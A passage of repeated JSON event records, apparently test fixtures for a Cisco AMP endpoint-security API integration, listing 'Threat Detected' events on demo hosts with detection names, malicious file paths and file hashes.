Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat 